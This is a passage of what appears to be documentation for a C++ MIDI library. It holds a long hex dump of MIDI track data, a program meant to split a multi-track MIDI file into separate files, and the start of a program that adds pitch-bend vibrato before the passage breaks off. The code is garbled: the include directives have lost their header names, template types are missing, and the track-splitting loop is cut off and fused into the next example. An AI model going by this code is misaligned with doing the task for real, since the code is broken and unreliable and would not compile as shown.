40 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 82\n68 81 40 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 78 81 45 40 00 91 44 40 81 70 81 44 40 00 91 40\n40 78 81 40 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 44 40 78 81 44 40 00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 81 70 81 49 40 00 91\n46 40 81 70 81 46 40 00 91 44 40 81 70 81 44 40 00 91 44 40 85 50 81 44 40 00 91 44 40 81 70 81 44 40 00 91 42 40 81 70\n81 42 40 00 91 41 40 81 70 81 41 40 00 91 45 40 81 70 81 45 40 00 91 44 40 87 40 81 44 40 77 90 00 00 00 ff 2f 00 4d 54\n72 6b 00 00 08 ba 98 30 92 3d 40 81 70 82 3d 40 00 92 3c 40 81 70 82 3c 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 83 60\n82 3f 40 00 92 3d 40 81 70 82 3d 40 00 92 42 40 82 68 82 42 40 00 92 40 40 78 82 40 40 00 92 3f 40 78 82 3f 40 00 92 3d\n40 78 82 3d 40 00 92 3d 40 81 70 82 3d 40 00 92 3b 40 81 70 82 3b 40 00 92 3d 40 81 70 82 3d 40 00 92 42 40 82 68 82 42\n40 00 92 40 40 78 82 40 40 00 92 3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3f 40 81 70 82 3f 40 00 92 44 40 81 70\n82 44 40 78 92 45 40 78 82 45 40 00 92 44 40 78 82 44 40 00 92 42 40 78 82 42 40 00 92 41 40 78 82 41 40 00 92 3d 40 78\n82 3d 40 00 92 42 40 81 70 82 42 40 00 92 40 40 85 50 82 40 40 00 92 44 40 81 70 82 44 40 00 92 46 40 81 70 82 46 40 92\n60 92 3d 40 81 70 82 3d 40 00 92 3c 40 81 70 82 3c 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 83 60 82 3f 40 00 92 3d 40\n87 40 82 3d 40 00 92 36 40 78 82 36 40 00 92 38 40 78 82 38 40 00 92 3a 40 78 82 3a 40 00 92 3b 40 78 82 3b 40 00 92 3d\n40 83 60 82 3d 40 81 70 92 40 40 81 70 82 40 40 00 92 3f 40 81 70 82 3f 40 00 92 44 40 81 70 82 44 40 00 92 42 40 83 60\n82 42 40 00 92 40 40 81 70 82 40 40 8b 20 92 44 40 81 70 82 44 40 00 92 43 40 81 70 82 43 40 00 92 47 40 81 70 82 47 40\n00 92 46 40 84 58 82 46 40 00 92 3f 40 78 82 3f 40 00 92 44 40 82 68 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82\n40 40 00 92 42 40 82 68 82 42 40 00 92 40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92 44 40 89 30 82 44 40 8c 18 92 3d\n40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 41 40 3c 82 41 40 00 92 3f\n40 3c 82 3f 40 00 92 41 40 81 70 82 41 40 00 92 42 40 78 82 42 40 00 92 36 40 3c 82 36 40 00 92 38 40 3c 82 38 40 00 92\n39 40 78 82 39 40 00 92 3b 40 78 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92\n39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92\n39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92\n40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92\n3d 40 3c 82 3d 40 00 92 3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 3c 82 3b 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 83 60 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92 36 40 3c 82 36 40 00 92 34 40 3c 82 34 40 00\n92 33 40 3c 82 33 40 00 92 31 40 3c 82 31 40 00 92 30 40 3c 82 30 40 00 92 31 40 3c 82 31 40 00 92 33 40 81 70 82 33 40\n8e 08 92 31 40 78 82 31 40 00 92 36 40 78 82 36 40 00 92 36 40 78 82 36 40 00 92 36 40 78 82 36 40 00 92 34 40 3c 82 34\n40 00 92 33 40 3c 82 33 40 00 92 34 40 81 70 82 34 40 00 92 37 40 81 70 82 37 40 00 92 38 40 81 70 82 38 40 00 92 35 40\n78 82 35 40 87 40 92 33 40 78 82 33 40 00 92 38 40 78 82 38 40 00 92 38 40 78 82 38 40 00 92 38 40 78 82 38 40 00 92 36\n40 3c 82 36 40 00 92 34 40 3c 82 34 40 00 92 36 40 82 2c 82 36 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92\n36 40 3c 82 36 40 00 92 35 40 3c 82 35 40 00 92 33 40 3c 82 33 40 00 92 35 40 3c 82 35 40 00 92 31 40 3c 82 31 40 00 92\n36 40 3c 82 36 40 00 92 35 40 3c 82 35 40 00 92 36 40 3c 82 36 40 00 92 38 40 3c 82 38 40 00 92 39 40 3c 82 39 40 00 92\n38 40 3c 82 38 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3c 40 3c 82 3c 40 00 92\n3d 40 3c 82 3d 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92\n42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 45 40 3c 82 45 40 00 92\n44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92\n40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92\n3f 40 3c 82 3f 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92\n42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 3d 40 3c 82 3d 40 00 92 40 40 3c 82 40 40 00 92\n3f 40 81 70 82 3f 40 91 68 92 38 40 78 82 38 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d 40\n00 92 3c 40 3c 82 3c 40 00 92 3a 40 3c 82 3a 40 00 92 3c 40 81 70 82 3c 40 00 92 3d 40 83 60 82 3d 40 00 92 3b 40 82 68\n82 3b 40 00 92 42 40 78 82 42 40 00 92 41 40 81 70 82 41 40 00 92 42 40 81 70 82 42 40 00 92 3b 40 81 70 82 3b 40 00 92\n3d 40 84 1c 82 3d 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 83 60 82 38 40\n93 58 92 3b 40 78 82 3b 40 00 92 40 40 78 82 40 40 00 92 40 40 78 82 40 40 00 92 40 40 78 82 40 40 00 92 3e 40 3c 82 3e\n40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 81 70 82 3b 40 78 92 3d 40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82\n42 40 00 92 42 40 78 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 81 70 82 40 40 00 92 42 40 83\n24 82 42 40 00 92 44 40 3c 82 44 40 00 92 45 40 78 82 45 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 44 40\n78 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 81 70 82 3f 40 00 92 40 40 83 60 82 40 40 00 92\n3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3f 40 78 82 3f 40 00 92 41 40 3c 82 41 40 00 92 42 40 3c 82 42 40 00 92\n44 40 78 82 44 40 00 92 44 40 78 82 44 40 78 92 3d 40 78 82 3d 40 00 92 3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92\n3c 40 81 70 82 3c 40 00 92 3d 40 83 60 82 3d 40 00 92 3f 40 81 70 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d\n40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f\n40 00 92 40 40 78 82 40 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 46 40 81 70 82 46 40 00 92 3f 40 83 60\n82 3f 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 82 68 82 3f 40 00 92 40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92 41\n40 78 82 41 40 00 92 3d 40 83 60 82 3d 40 00 92 3d 40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92\n42 40 81 70 82 42 40 00 92 41 40 78 82 41 40 00 92 3f 40 78 82 3f 40 00 92 41 40 83 60 82 41 40 77 90 00 00 00 ff 2f 00\n4d 54 72 6b 00 00 07 ac 8b 20 93 38 40 83 60 83 38 40 00 93 37 40 81 70 83 37 40 00 93 3b 40 81 70 83 3b 40 00 93 3a 40\n83 60 83 3a 40 00 93 38 40 81 70 83 38 40 00 93 39 40 82 68 83 39 40 00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00\n93 38 40 78 83 38 40 00 93 3d 40 78 83 3d 40 00 93 36 40 78 83 36 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00\n93 3b 40 82 68 83 3b 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 38 40 81 70 83 38\n40 00 93 36 40 78 83 36 40 00 93 34 40 78 83 34 40 00 93 33 40 82 68 83 33 40 00 93 32 40 78 83 32 40 00 93 31 40 87 40\n83 31 40 90 70 93 38 40 81 70 83 38 40 00 93 37 40 81 70 83 37 40 00 93 3b 40 81 70 83 3b 40 00 93 3a 40 83 60 83 3a 40\n00 93 38 40 78 83 38 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 35 40 81 70 83 35\n40 00 93 39 40 81 70 83 39 40 00 93 38 40 83 60 83 38 40 00 93 36 40 84 58 83 36 40 00 93 38 40 3c 83 38 40 00 93 36 40\n3c 83 36 40 00 93 34 40 78 83 34 40 00 93 36 40 3c 83 36 40 00 93 38 40 3c 83 38 40 00 93 39 40 78 83 39 40 00 93 36 40\n78 83 36 40 00 93 38 40 81 70 83 38 40 00 93 31 40 89 30 83 31 40 00 93 36 40 81 70 83 36 40 00 93 34 40 78 83 34 40 00\n93 33 40 78 83 33 40 00 93 34 40 78 83 34 40 00 93 36 40 78 83 36 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00\n93 38 40 78 83 38 40 00 93 39 40 78 83 39 40 00 93 3b 40 89 30 83 3b 40 00 93 3d 40 81 70 83 3d 40 00 93 3c 40 81 70 83\n3c 40 00 93 40 40 81 70 83 40 40 00 93 3f 40 83 60 83 3f 40 00 93 3d 40 84 58 83 3d 40 00 93 3b 40 78 83 3b 40 00 93 3a\n40 78 83 3a 40 00 93 38 40 81 70 83 38 40 00 93 37 40 3c 83 37 40 00 93 35 40 3c 83 35 40 00 93 37 40 81 70 83 37 40 00\n93 38 40 3c 83 38 40 00 93 3a 40 3c 83 3a 40 00 93 38 40 3c 83 38 40 00 93 37 40 3c 83 37 40 00 93 38 40 3c 83 38 40 00\n93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00 93 3b 40 3c 83 3b 40 00\n93 39 40 3c 83 39 40 00 93 38 40 3c 83 38 40 00 93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 3d 40 3c 83 3d 40 00\n93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 3d 40 3c 83 3d 40 00 93 3b 40 3c 83 3b 40 00 93 3a 40 3c 83 3a 40 00\n93 3c 40 3c 83 3c 40 00 93 3d 40 3c 83 3d 40 00 93 3f 40 3c 83 3f 40 00 93 3c 40 3c 83 3c 40 00 93 3d 40 83 60 83 3d 40\n98 30 93 36 40 81 70 83 36 40 00 93 35 40 81 70 83 35 40 00 93 39 40 81 70 83 39 40 00 93 38 40 83 60 83 38 40 00 93 36\n40 83 60 83 36 40 93 58 93 38 40 78 83 38 40 00 93 3d 40 78 83 3d 40 00 93 3d 40 78 83 3d 40 00 93 3d 40 78 83 3d 40 00\n93 3c 40 3c 83 3c 40 00 93 3a 40 3c 83 3a 40 00 93 3c 40 81 70 83 3c 40 00 93 3d 40 81 70 83 3d 40 00 93 39 40 81 70 83\n39 40 00 93 36 40 81 70 83 36 40 00 93 38 40 81 70 83 38 40 00 93 35 40 81 70 83 35 40 00 93 36 40 81 70 83 36 40 00 93\n38 40 83 60 83 38 40 00 93 33 40 83 60 83 33 40 9b 18 93 2c 40 78 83 2c 40 00 93 31 40 78 83 31 40 00 93 31 40 78 83 31\n40 00 93 31 40 78 83 31 40 00 93 30 40 3c 83 30 40 00 93 2e 40 3c 83 2e 40 00 93 30 40 81 70 83 30 40 00 93 31 40 81 70\n83 31 40 90 70 93 31 40 83 60 83 31 40 00 93 30 40 81 70 83 30 40 00 93 34 40 81 70 83 34 40 00 93 33 40 83 60 83 33 40\n00 93 31 40 78 83 31 40 00 93 34 40 78 83 34 40 00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40\n00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00 93 38 40 83 60 83 38 40 00 93 36 40 81 70 83 36 40 00 93 38 40 83 60\n83 38 40 00 93 39 40 81 70 83 39 40 00 93 36 40 82 2c 83 36 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34 40 00 93 33\n40 3c 83 33 40 00 93 34 40 78 83 34 40 00 93 31 40 78 83 31 40 00 93 38 40 83 60 83 38 40 00 93 36 40 81 70 83 36 40 00\n93 33 40 81 70 83 33 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 34 40 3c 83 34 40 00 93 36 40 3c 83 36 40\n00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40\n00 93 31 40 3c 83 31 40 00 93 33 40 3c 83 33 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40\n00 93 30 40 3c 83 30 40 00 93 33 40 3c 83 33 40 00 93 31 40 78 83 31 40 00 93 34 40 78 83 34 40 00 93 39 40 78 83 39 40\n00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40 00 93 37 40 3c 83 37 40 00 93 36 40 3c 83 36 40 00 93 34 40 81 70 83 34\n40 78 93 36 40 78 83 36 40 00 93 3b 40 78 83 3b 40 00 93 3b 40 78 83 3b 40 00 93 3b 40 78 83 3b 40 00 93 39 40 3c 83 39\n40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34\n40 00 93 33 40 81 70 83 33 40 78 93 38 40 78 83 38 40 00 93 3f 40 78 83 3f 40 00 93 3f 40 78 83 3f 40 00 93 3f 40 78 83\n3f 40 00 93 3d 40 3c 83 3d 40 00 93 3c 40 3c 83 3c 40 00 93 3d 40 83 60 83 3d 40 00 93 3c 40 81 70 83 3c 40 00 93 40 40\n82 68 83 40 40 00 93 31 40 78 83 31 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 35\n40 3c 83 35 40 00 93 33 40 3c 83 33 40 00 93 31 40 83 60 83 31 40 00 93 33 40 82 68 83 33 40 00 93 33 40 78 83 33 40 00\n93 38 40 78 83 38 40 00 93 38 40 78 83 38 40 00 93 38 40 78 83 38 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34 40 00\n93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00\n93 34 40 78 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40 00 93 33 40 78 83 33 40 00 93 2c 40 78 83 2c 40 00\n93 31 40 78 83 31 40 00 93 31 40 78 83 31 40 00 93 31 40 78 83 31 40 00 93 2f 40 3c 83 2f 40 00 93 2e 40 3c 83 2e 40 00\n93 33 40 82 2c 83 33 40 00 93 34 40 3c 83 34 40 00 93 36 40 81 34 83 36 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33\n40 00 93 31 40 3c 83 31 40 00 93 38 40 83 60 83 38 40 00 93 39 40 82 68 83 39 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c\n83 39 40 00 93 3b 40 78 83 3b 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 3d 40 78\n83 3d 40 00 93 3b 40 3c 83 3b 40 00 93 39 40 3c 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 38 40 83\n60 83 38 40 77 90 00 00 00 ff 2f 00 4d 54 72 6b 00 00 07 cd 00 90 31 40 83 60 80 31 40 00 90 30 40 81 70 80 30 40 00 90\n34 40 81 70 80 34 40 00 90 33 40 83 60 80 33 40 00 90 31 40 78 80 31 40 00 90 33 40 78 80 33 40 00 90 34 40 82 68 80 34\n40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 33 40 78 80 33 40 00 90 38 40 78 80 38 40 00 90 31 40 78 80 31\n40 00 90 33 40 3c 80 33 40 00 90 34 40 3c 80 34 40 00 90 36 40 82 68 80 36 40 00 90 34 40 78 80 34 40 00 90 33 40 78 80\n33 40 00 90 31 40 78 80 31 40 00 90 33 40 81 70 80 33 40 00 90 31 40 82 68 80 31 40 00 90 2f 40 78 80 2f 40 00 90 2d 40\n78 80 2d 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 81 70 80 2d 40 00 90 2e 40 81 70 80 2e 40 00 90 30 40 81 70 80 30 40 00\n90 31 40 81 70 80 31 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 78 80 2d 40 00 90 2f 40 82 68 80 2f 40 00 90 2d 40 78 80 2d\n40 00 90 2c 40 78 80 2c 40 00 90 2a 40 78 80 2a 40 00 90 31 40 81 70 80 31 40 00 90 2d 40 82 68 80 2d 40 00 90 2c 40 78\n80 2c 40 00 90 2a 40 78 80 2a 40 00 90 28 40 78 80 28 40 00 90 2a 40 81 70 80 2a 40 00 90 2c 40 81 70 80 2c 40 00 90 2d\n40 78 80 2d 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 78 80 2d 40 00 90 2f 40 78 80 2f 40 00 90 31 40 78 80 31 40 00 90 2f\n40 78 80 2f 40 00 90 31 40 78 80 31 40 00 90 33 40 78 80 33 40 00 90 34 40 81 70 80 34 40 00 90 31 40 82 68 80 31 40 00\n90 2f 40 78 80 2f 40 00 90 2e 40 78 80 2e 40 00 90 2c 40 78 80 2c 40 00 90 31 40 81 70 80 31 40 00 90 33 40 81 70 80 33\n40 00 90 2c 40 81 70 80 2c 40 9a 20 90 2f 40 81 70 80 2f 40 00 90 2e 40 81 70 80 2e 40 00 90 33 40 81 70 80 33 40 00 90\n31 40 83 60 80 31 40 00 90 2f 40 84 58 80 2f 40 00 90 38 40 78 80 38 40 00 90 36 40 78 80 36 40 00 90 34 40 78 80 34 40\n00 90 3b 40 81 70 80 3b 40 00 90 2f 40 81 70 80 2f 40 00 90 34 40 81 70 80 34 40 00 90 39 40 81 70 80 39 40 00 90 38 40\n81 70 80 38 40 00 90 3d 40 83 60 80 3d 40 00 90 3c 40 81 70 80 3c 40 00 90 3d 40 81 70 80 3d 40 95 48 90 31 40 3c 80 31\n40 00 90 33 40 3c 80 33 40 00 90 34 40 78 80 34 40 00 90 36 40 78 80 36 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36\n40 00 90 38 40 3c 80 38 40 00 90 39 40 3c 80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34\n40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 36 40 3c 80 36 40 00 90 38 40 3c 80 38\n40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34\n40 00 90 33 40 3c 80 33 40 00 90 34 40 3c 80 34 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 39 40 3c 80 39\n40 00 90 38 40 3c 80 38 40 00 90 39 40 3c 80 39 40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 33 40 3c 80 33\n40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38 40 3c 80 38\n40 00 90 31 40 81 70 80 31 40 95 48 90 34 40 78 80 34 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 40 78\n80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38 40 81 70 80 38 40 00 90 39 40 81 70 80 39 40 00 90 36\n40 81 70 80 36 40 00 90 2f 40 81 70 80 2f 40 00 90 34 40 81 70 80 34 40 00 90 2d 40 83 60 80 2d 40 00 90 2c 40 81 70 80\n2c 40 91 68 90 2c 40 78 80 2c 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 2f 40 3c\n80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2f 40 3c\n80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2e 40 3c 80 2e 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c\n80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c\n80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c\n80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2b 40 81 70 80 2b 40 00 90 2c 40 81 70 80 2c 40 00 90 2e 40 81 70 80 2e 40 00 90\n33 40 81 70 80 33 40 00 90 2c 40 81 70 80 2c 40 85 50 90 25 40 83 60 80 25 40 00 90 30 40 81 70 80 30 40 00 90 28 40 81\n70 80 28 40 00 90 27 40 83 60 80 27 40 00 90 25 40 78 80 25 40 00 90 25 40 3c 80 25 40 00 90 27 40 3c 80 27 40 00 90 28\n40 78 80 28 40 00 90 2a 40 78 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2d\n40 3c 80 2d 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 28 40 3c 80 28 40 00 90 2c 40 3c 80 2c 40 00 90 2a\n40 3c 80 2a 40 00 90 28 40 3c 80 28 40 00 90 2a 40 3c 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 28\n40 3c 80 28 40 00 90 27 40 3c 80 27 40 00 90 2a 40 3c 80 2a 40 00 90 28 40 78 80 28 40 00 90 34 40 78 80 34 40 00 90 39\n40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38\n40 78 80 38 40 00 90 2c 40 78 80 2c 40 00 90 31 40 78 80 31 40 00 90 2f 40 78 80 2f 40 00 90 2d 40 81 70 80 2d 40 00 90\n2c 40 78 80 2c 40 8f 00 90 31 40 78 80 31 40 00 90 36 40 78 80 36 40 00 90 36 40 78 80 36 40 00 90 36 40 78 80 36 40 00\n90 35 40 3c 80 35 40 00 90 33 40 3c 80 33 40 00 90 35 40 81 70 80 35 40 00 90 36 40 81 70 80 36 40 86 48 90 2c 40 78 80\n2c 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 30 40 3c 80 30 40 00 90 2e 40 3c 80\n2e 40 00 90 30 40 3c 80 30 40 00 90 31 40 3c 80 31 40 00 90 33 40 3c 80 33 40 00 90 30 40 3c 80 30 40 00 90 28 40 81 70\n80 28 40 78 90 2d 40 78 80 2d 40 00 90 27 40 81 70 80 27 40 78 90 2c 40 78 80 2c 40 00 90 25 40 78 80 25 40 8c 18 90 31\n40 81 70 80 31 40 00 90 30 40 81 70 80 30 40 00 90 34 40 81 70 80 34 40 00 90 33 40 83 60 80 33 40 00 90 31 40 78 80 31\n40 00 90 34 40 78 80 34 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 38 40 3c 80 38\n40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 2f 40 3c 80 2f\n40 00 90 2e 40 81 70 80 2e 40 00 90 2d 40 82 68 80 2d 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 29 40 81\n70 80 29 40 00 90 2a 40 83 60 80 2a 40 00 90 2c 40 8f 00 80 2c 40 00 90 2b 40 83 60 80 2b 40 00 90 2c 40 87 40 80 2c 40\n00 90 31 40 8f 00 80 31 40 77 90 00 00 00 ff 2f 00\n```\n\n\n### How to split MIDI tracks into separate MIDI files ###\n\nThe following program takes a multi-track MIDI file with three\nor more tracks, and splits out each track into a separate MIDI\nfile. The expression track of the original MIDI file is copied\ninto the 0th track of the new MIDI files, and the individual\ntracks of the first MIDI file are copied to the 1st track of\nthe output MIDI files.\n\n```cpp\n#include \"MidiFile.h\"\n#include \n#include \nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading input\" << endl;\n return 1;\n }\n if (midifile.getTrackCount() < 3) {\n cerr << \"Not enough tracks to split\" << endl;\n return 1;\n }\n string basename = argv[2];\n if (basename.substr(basename.size() - 4) == \".mid\")\n basename = basename.substr(0, basename.size() - 4);\n int outcount = midifile.getTrackCount() - 1;\n vector outputs(outcount);\n for (int i=0; i\n#include \n#include \nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"f|frequency=d:4.0\", \"vibrato frequency\");\n options.define(\"d|depth=d:20.0\", \"vibrato depth in cents\");\n options.define(\"b|bend-max=d:200.0\", \"pitch bend depth\");\n options.define(\"s|sample-rate=d:100.0\", \"sample rate\");\n options.define(\"o|output-file=s\", \"output filename\");\n options.define(\"c|channel=i:0\", \"output channel\");\n options.process(argc, argv);\n\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Problem reading file\" << endl;\n return 1;\n }\n\n string filename = options.getString(\"output-file\");\n int channel = options.getInteger(\"channel\");\n double freq = options.getDouble(\"frequency\");\n double depth = options.getDouble(\"depth\");\n double bend = options.getDouble(\"bend-max\");\n double srate = options.getDouble(\"sample-rate\");\n double phase = 0.0;\n double twopi = 2.0 * M_PI;\n double increment = twopi * freq / srate;\n double maxtime = midifile.getFileDurationInSeconds();\n midifile.addTrack(); // store vibrato in separate track\n pair tickbend;\n vector> storage;\n int count = maxtime * srate;\n storage.reserve(maxtime * srate + 1000);\n for (int i=0; i 0) && (tickbend.first == 